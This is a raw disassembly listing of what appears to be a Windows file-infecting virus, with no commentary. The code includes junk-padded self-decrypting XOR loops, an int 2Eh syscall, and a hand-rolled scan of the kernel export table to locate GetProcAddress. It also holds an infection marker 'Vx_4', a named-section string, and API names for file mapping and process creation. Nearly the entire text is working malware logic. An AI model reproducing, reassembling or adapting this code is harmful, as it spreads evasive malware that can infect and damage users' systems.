push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_3144489F: ; CODE XREF: sub_31444259+6B�j
; sub_31444259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_314448AB: ; CODE XREF: sub_31444259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_3144485E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 0DB81234h
dd 6003694Dh, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 36946DFh
dd 8FB8B1EBh, 0E803694Ch, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2030601h, 0ADBA0705h
dd 311E40A4h, 119415FFh, 0FF8B0100h
; ---------------------------------------------------------------------------
pusha
push ebp
mov ebp, esp
cmc
sub eax, eax
loc_314449D3: ; CODE XREF: UPX2:314449D9�j
dec al
or al, al
jz short loc_314449DD
jnz short loc_314449D3
jmp short near ptr dword_31444A44
; ---------------------------------------------------------------------------
loc_314449DD: ; CODE XREF: UPX2:314449D7�j
stc
mov edx, edx
sub esi, esi
sub ecx, ecx
stc
mov cl, 97h
nop
stc
loc_314449E9: ; CODE XREF: UPX2:314449F1�j
lea esi, [esi+1]
jmp short $+2
xchg ebx, ebx
nop
loop loc_314449E9
xchg ebx, ebx
call sub_31444A3F
cld
add edx, 1DD2h
push edx
xor edi, edi
or edi, 2A44h
stc
xchg ebx, ebx
loc_31444A0D: ; CODE XREF: UPX2:31444A26�j
xchg al, [edx]
cld
clc
xor ax, si
xchg ebx, ebx
nop
xchg ebx, ebx
jmp short $+2
nop
xchg al, [edx]
stc
inc edx
dec edi
clc
xchg ebx, ebx
or edi, edi
jnz short loc_31444A0D
pop edx
nop
leave
xchg ebx, ebx
xchg ebx, ebx
cld
mov [esp+14h], edx
clc
cmc
xchg ebx, ebx
popa
nop
jmp edx
; ---------------------------------------------------------------------------
db 90h
db 89h, 0C0h
; =============== S U B R O U T I N E =======================================
sub_31444A3F proc near ; CODE XREF: UPX2:314449F5�p
pop edx
cld
jmp edx
sub_31444A3F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dword_31444A44 dd 107h dup(0) dd 9B470000h, 8AD7C80h, 3317C83h, 0ADA07C91h, 7C80h, 0
dd 0BDB60000h, 1A247C80h, 945C7C80h, 23677C80h, 42C7C80h
dd 6377C81h, 4B0F7C81h, 0C0587C86h, 0E7EC7C80h, 0ABDE7C80h
dd 153C7C80h, 0A777C81h, 1C457C81h, 0B6A17C83h, 8FF7C80h
dd 5DCA7C86h, 11DA7C83h, 2ADE7C81h, 1BA57C81h, 1D777C82h
dd 0B9057C80h, 0BB767C80h, 9E17C80h, 3DE57C83h, 3F587C86h
dd 27827C86h, 1CB87C81h, 24427C83h, 0B1C7C80h, 0B9747C81h
dd 9A517C80h, 0D877C80h, 0D4607C81h, 0D6827C90h, 0D7547C90h
dd 0D7697C90h, 0D7937C90h, 7C90h, 0DC550000h, 0DCFD7C90h
dd 0DD907C90h, 0DDBA7C90h, 0DEB67C90h, 0E0457C90h, 0EA327C90h
dd 30C67C90h, 7C91h, 0F5h dup(0)
dd 7C900000h, 133Dh dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
cmc
xchg ebx, ebx
push ebp
mov ebp, esp
call sub_3144A022
mov ebx, ebx
call sub_3144A0DA
xchg ebx, ebx
xchg ebx, ebx
mov ebp, 12FFC0h ; DATA XREF: sub_3144A022+C�w
; UPX2:3144F06A�w
jmp short $+2
jmp loc_3144A053
start endp
; =============== S U B R O U T I N E =======================================
sub_3144A022 proc near ; CODE XREF: start+6�p
push dword ptr fs:0
mov fs:0, esp
xor dword ptr ds:loc_3144A016+1, ebp
xchg ebx, ebx
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push 800h
push 80000000h
push ecx
push 2
push ecx
call ds:dword_31438090 ; GetProcAddress
loc_3144A053: ; CODE XREF: start+1D�j
mov ebx, [ebp-8]
mov fs:0, ebx
stc
jmp short $+2
sub eax, eax
loc_3144A061: ; CODE XREF: sub_3144A022+45�j
dec al
or al, al
jz short loc_3144A06B
jnz short loc_3144A061
jmp short loc_3144A0D2
; ---------------------------------------------------------------------------
loc_3144A06B: ; CODE XREF: sub_3144A022+43�j
xchg ebx, ebx
clc
xchg ebx, ebx
cld
cld
jmp short $+2
cmc
call sub_3144A089
sub_3144A022 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144A07A proc near ; CODE XREF: sub_3144A089:loc_3144A0B3�p
xchg al, [edi]
xchg ebx, ebx
clc
xor ax, bx
xchg al, [edi]
cld
retn
sub_3144A07A endp
; ---------------------------------------------------------------------------
db 87h, 0DBh
db 90h
; =============== S U B R O U T I N E =======================================
sub_3144A089 proc near ; CODE XREF: sub_3144A022+53�p
pop edi
mov ecx, ecx
sub edi, 0FFFFFF92h
sub esi, esi
xor esi, 29CCh
mov eax, eax
cmc
and ebx, 0
add ebx, 5
cmc
xchg ebx, ebx
xchg ebx, ebx
cmc
nop
push edi
jmp short $+2
clc
cmc
cld
loc_3144A0B3: ; CODE XREF: sub_3144A089+41�j
call sub_3144A07A
jmp short $+2
mov ecx, ecx
stc
inc edi
add bx, 0E3h
sub esi, 1
cld
clc
or esi, esi
jnz short loc_3144A0B3
pop edi
xchg ebx, ebx
mov ebx, ebx
leave
loc_3144A0D2: ; CODE XREF: sub_3144A022+47�j
clc
jmp edi
sub_3144A089 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 87h, 0DBh
; ---------------------------------------------------------------------------
jmp short $+2
cld
; =============== S U B R O U T I N E =======================================
sub_3144A0DA proc near ; CODE XREF: start+D�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_3144A0DA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cld
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_3144A135
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_3144A129
mov ebx, [eax+29C1h]
jmp short loc_3144A133
; ---------------------------------------------------------------------------
loc_3144A129: ; CODE XREF: UPX2:3144A11F�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_3144A133: ; CODE XREF: UPX2:3144A127�j
mov ebx, [ebx]
loc_3144A135: ; CODE XREF: UPX2:3144A107�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 11EEDh
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_3144A163
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_3144A163: ; CODE XREF: UPX2:3144A15C�j
and ebx, 0FFFFF000h
loc_3144A169: ; CODE XREF: UPX2:3144A178�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_3144A17A
loc_3144A172: ; CODE XREF: UPX2:3144A187�j
sub ebx, 100h
jnz short loc_3144A169
loc_3144A17A: ; CODE XREF: UPX2:3144A170�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_3144A172
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3144A194: ; CODE XREF: UPX2:loc_3144A1A8�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_3144A1A8
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3144A1AD
loc_3144A1A8: ; CODE XREF: UPX2:3144A19D�j
loop loc_3144A194
pop ecx
jmp short loc_3144A1D8
; ---------------------------------------------------------------------------
loc_3144A1AD: ; CODE XREF: UPX2:3144A1A6�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_3144A21F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144A266
loc_3144A1D8: ; CODE XREF: UPX2:3144A1AB�j
; sub_3144A266+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_3144A204
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_3144A204: ; CODE XREF: sub_3144A266-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_3144A266
; ---------------------------------------------------------------------------
dw 3DA0h
; =============== S U B R O U T I N E =======================================
sub_3144A208 proc near ; CODE XREF: sub_3144C543+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_3144A210: ; CODE XREF: sub_3144A208+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_3144A210
pop ebx
retn
sub_3144A208 endp
; ---------------------------------------------------------------------------
loc_3144A21F: ; CODE XREF: UPX2:3144A1D6�j
call near ptr loc_3144A22E+2
inc ebx
insb
outsd
jnb short near ptr loc_3144A28B+3
dec eax
popa
outsb
db 64h
insb
loc_3144A22E: ; CODE XREF: UPX2:loc_3144A21F�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_3144A24A+1
inc ebx
jb short loc_3144A2A6
popa
jz short near ptr loc_3144A2A8+1
inc ebp
jbe short near ptr loc_3144A2A8+4
outsb
jz short loc_3144A28B
loc_3144A24A: ; CODE XREF: UPX2:3144A239�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_3144A266
inc edi
db 65h
jz short near ptr loc_3144A2A8+1
popa
jnb short near ptr loc_3144A2D2+2
inc ebp
jb short near ptr loc_3144A2D2+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3144A266 proc near ; CODE XREF: UPX2:3144A254�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 3144A1D8 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 3144A61C SIZE 0000000B BYTES
push ebx
call esi ; lstrcatA
mov [ebp+103E6Ah], eax
call sub_3144A647
test eax, eax
jz loc_3144A1D8
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_3144A61C
loc_3144A28B: ; CODE XREF: UPX2:3144A248�j
; UPX2:3144A227�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_3144A2A8
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_3144A2A6: ; CODE XREF: UPX2:3144A23F�j
jmp short loc_3144A2AF
; ---------------------------------------------------------------------------
loc_3144A2A8: ; CODE XREF: sub_3144A266+2C�j
; UPX2:3144A242�j ...
and dword ptr [ebp+101598h], 0
loc_3144A2AF: ; CODE XREF: sub_3144A266:loc_3144A2A6�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_3144A2D2: ; CODE XREF: UPX2:3144A25E�j
; UPX2:3144A261�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_3144A684
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_3144A3CB
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_3144A61C
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_3144A61C
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_3144A61C
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_3144A3BB
jmp loc_3144A61C
; ---------------------------------------------------------------------------
loc_3144A3BB: ; CODE XREF: sub_3144A266+14B�p
; sub_3144A266+162�j
push 1
pop ecx
jecxz short locret_3144A3CA
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_3144A3BB
; ---------------------------------------------------------------------------
locret_3144A3CA: ; CODE XREF: sub_3144A266+158�j
retn
; ---------------------------------------------------------------------------
loc_3144A3CB: ; CODE XREF: sub_3144A266+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_3144A61C
call near ptr loc_3144A3E2+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3144A3E2: ; CODE XREF: sub_3144A266+172�p
add bh, bh
sub_3144A266 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_3144A684
cmp dword ptr [ebp+103F2Eh], 0
jz loc_3144A61C
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_3144A61C
mov ecx, [ebp+103F06h]
jecxz short loc_3144A46B
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_3144A46B
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_3144A46B: ; CODE XREF: UPX2:3144A44F�j
; UPX2:3144A460�j
call sub_3144A628
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_3144A4B4: ; CODE XREF: UPX2:3144A4BD�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_3144A4B4
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_3144A61C
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144A266
loc_3144A61C: ; CODE XREF: sub_3144A266+1F�j
; sub_3144A266+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_3144A1D8
; END OF FUNCTION CHUNK FOR sub_3144A266
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_3144A628 proc near ; CODE XREF: UPX2:loc_3144A46B�p
; sub_3144A647+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_3144A628 endp
; ---------------------------------------------------------------------------
aVx_4_1 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3144A647 proc near ; CODE XREF: sub_3144A266+9�p
xor ecx, ecx
call sub_3144A628
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_3144A647 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_3144A684 proc near ; CODE XREF: sub_3144A266+7C�p
; UPX2:3144A3FA�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_3144A68F: ; CODE XREF: sub_3144A684+E�j
lodsb
test al, al
jnz short loc_3144A68F
loop sub_3144A684
retn
sub_3144A684 endp
; =============== S U B R O U T I N E =======================================
sub_3144A697 proc near ; CODE XREF: sub_3144C215+25�p
; FUNCTION CHUNK AT 3144A721 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 3144AAF1 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_3144A6C4+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_3144A721
jbe short near ptr loc_3144A721+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_3144A728
inc ecx
loc_3144A6C4: ; CODE XREF: sub_3144A697+13�p
add [eax-1], dl
sub_3144A697 endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144A697
loc_3144A721: ; CODE XREF: sub_3144A697+1F�j
; sub_3144A697+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3144A78B+2
loc_3144A728: ; CODE XREF: sub_3144A697+2A�j
push edx
db 65h
insd
outsd
jz short loc_3144A793
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3144A79E+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_3144A7AA+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_3144A7C9+1
push 4500746Fh
js short loc_3144A7C7
jz short near ptr loc_3144A7B3+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_3144A7E8
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_3144A7CB+6
loc_3144A78B: ; CODE XREF: sub_3144A697+8F�j
imul ebp, [ebp+41h], 69727474h
loc_3144A793: ; CODE XREF: sub_3144A697+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_3144A7DA
add [edi+65h], al
jz short near ptr loc_3144A7E3+1
loc_3144A79E: ; CODE XREF: sub_3144A697+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_3144A7F0
loc_3144A7AA: ; CODE XREF: sub_3144A697+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_3144A7B3: ; CODE XREF: sub_3144A697+C7�j
db 65h
jz short near ptr loc_3144A802+1
outsd
db 64h
jnz short near ptr loc_3144A821+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_3144A815+6
loc_3144A7C7: ; CODE XREF: sub_3144A697+C5�j
db 65h
insd
loc_3144A7C9: ; CODE XREF: sub_3144A697+BE�j
jo short near ptr loc_3144A80F+2
loc_3144A7CB: ; CODE XREF: sub_3144A697+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_3144A829+3
db 65h
insd
loc_3144A7DA: ; CODE XREF: sub_3144A697+FF�j
jo short near ptr loc_3144A829+3
popa
jz short near ptr loc_3144A846+1
inc ecx
add [edi+65h], al
loc_3144A7E3: ; CODE XREF: sub_3144A697+105�j
jz short loc_3144A83B
db 65h
jb short near ptr loc_3144A85A+1
loc_3144A7E8: ; CODE XREF: sub_3144A697+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_3144A7F0: ; CODE XREF: sub_3144A697+110�j
db 65h
jb short near ptr loc_3144A864+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_3144A853+1
outsd
insb
jnz short near ptr loc_3144A869+6
loc_3144A802: ; CODE XREF: sub_3144A697:loc_3144A7B3�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3144A874+2
popa
jz short near ptr loc_3144A874+1
outsd
outsb
inc ecx
loc_3144A80F: ; CODE XREF: sub_3144A697:loc_3144A7C9�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_3144A815: ; CODE XREF: sub_3144A697+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3144A877
loc_3144A821: ; CODE XREF: sub_3144A697+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_3144A829: ; CODE XREF: sub_3144A697+13F�j
; sub_3144A697:loc_3144A7DA�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_3144A83B: ; CODE XREF: sub_3144A697:loc_3144A7E3�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_3144A8B1+1
arpl [ebp+73h], sp
loc_3144A846: ; CODE XREF: sub_3144A697+146�j
jnb short $+2
push eax
jb short loc_3144A8BA
arpl [ebp+73h], sp
jnb short near ptr loc_3144A87C+7
xor al, [esi+69h]
loc_3144A853: ; CODE XREF: sub_3144A697+164�j
jb short near ptr loc_3144A8C2+6
jz short $+2
push eax
jb short near ptr loc_3144A8C2+7
loc_3144A85A: ; CODE XREF: sub_3144A697+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_3144A891+1
xor cl, [esi+65h]
js short near ptr loc_3144A8D4+4
loc_3144A864: ; CODE XREF: sub_3144A697:loc_3144A7F0�j
add [ebx+65h], dl
jz short near ptr loc_3144A8AD+2
loc_3144A869: ; CODE XREF: sub_3144A697+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3144A874: ; CODE XREF: sub_3144A697+173�j
; sub_3144A697+170�j
db 65h
jnb short loc_3144A8B8
loc_3144A877: ; CODE XREF: sub_3144A697+188�j
add [ebx+65h], dl
jz short loc_3144A8C2
loc_3144A87C: ; CODE XREF: sub_3144A697+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_3144A900
jz short loc_3144A8F4
insd
push esp
loc_3144A891: ; CODE XREF: sub_3144A697+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_3144A8FB
imul esp, [ebp+77h], 6946664Fh
insb
loc_3144A8AD: ; CODE XREF: sub_3144A697+1D0�j
add gs:[esi+69h], dl
loc_3144A8B1: ; CODE XREF: sub_3144A697+1AA�j
jb short near ptr loc_3144A926+1
jnz short loc_3144A916
insb
inc ecx
insb
loc_3144A8B8: ; CODE XREF: sub_3144A697:loc_3144A874�j
insb
outsd
loc_3144A8BA: ; CODE XREF: sub_3144A697+1B2�j
arpl [eax], ax
push edi
jb short loc_3144A928
jz short loc_3144A926
inc esi
loc_3144A8C2: ; CODE XREF: sub_3144A697+1E3�j
; sub_3144A697:loc_3144A853�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_3144A942
push eax
jb short near ptr loc_3144A937+3
jbe short near ptr loc_3144A937+5
insb
loc_3144A8D4: ; CODE XREF: sub_3144A697+1CB�j
db 65h, 67h, 65h
jnb near ptr 0A92Dh
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3144A923+1
jb short near ptr loc_3144A947+1
popa
jz short loc_3144A94B
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_3144A958
push eax
loc_3144A8F4: ; CODE XREF: sub_3144A697+1F6�j
jb short loc_3144A965
arpl [ebp+73h], sp
jnb short $+2
loc_3144A8FB: ; CODE XREF: sub_3144A697+20C�j
dec esi
jz short near ptr loc_3144A93E+3
jb short loc_3144A965
loc_3144A900: ; CODE XREF: sub_3144A697+1F4�j
popa
jz short loc_3144A968
push eax
jb short loc_3144A975
arpl [ebp+73h], sp
jnb short near ptr loc_3144A94B+5
js short $+2
dec esi
jz short loc_3144A953
jb short loc_3144A977
popa
jz short near ptr loc_3144A977+3
push ebx
loc_3144A916: ; CODE XREF: sub_3144A697+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3144A986+1
popa
loc_3144A923: ; CODE XREF: sub_3144A697+248�j
jz short loc_3144A98A
push ebp
loc_3144A926: ; CODE XREF: sub_3144A697+228�j
; sub_3144A697:loc_3144A8B1�j
jnb short near ptr loc_3144A98C+1
loc_3144A928: ; CODE XREF: sub_3144A697+226�j
jb short near ptr loc_3144A977+3
jb short loc_3144A99B
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_3144A981
popa
jo short near ptr loc_3144A98C+1
loc_3144A937: ; CODE XREF: sub_3144A697+238�j
; sub_3144A697+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_3144A93E: ; CODE XREF: sub_3144A697+265�j
arpl [ecx+ebp*2+6Fh], si
loc_3144A942: ; CODE XREF: sub_3144A697+235�j
outsb
add [esi+74h], cl
dec edi
loc_3144A947: ; CODE XREF: sub_3144A697+24A�j
jo short loc_3144A9AE
outsb
inc esi
loc_3144A94B: ; CODE XREF: sub_3144A697+24D�j
; sub_3144A697+272�j
imul ebp, [ebp+0], 704F744Eh
loc_3144A953: ; CODE XREF: sub_3144A697+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_3144A9C7
loc_3144A958: ; CODE XREF: sub_3144A697+25A�j
arpl [ebp+73h], sp
jnb short loc_3144A9B1
outsd
imul esp, [ebp+6Eh], 0
